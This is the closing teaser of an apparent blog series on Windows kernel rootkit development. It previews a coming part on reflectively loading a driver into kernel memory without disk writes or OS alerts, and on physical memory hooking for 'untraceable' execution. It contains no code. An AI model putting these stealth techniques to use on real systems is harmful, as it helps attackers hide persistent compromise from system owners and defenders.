In Part 4, we will abandon the OS Loader entirely. We will dive into Reflective Kernel Loading, the process of manually parsing, mapping, and relocating a compiled .sys file directly into Ring-0 memory without ever touching the disk or alerting the OS. We will also confront the harsh reality of kernel stability, exploring why complex rootkits inevitably crash the system when executed from a hijacked syscall context, and how to use raw Physical Memory Hooking to achieve flawless, untraceable PASSIVE_LEVEL execution.

See you next time!

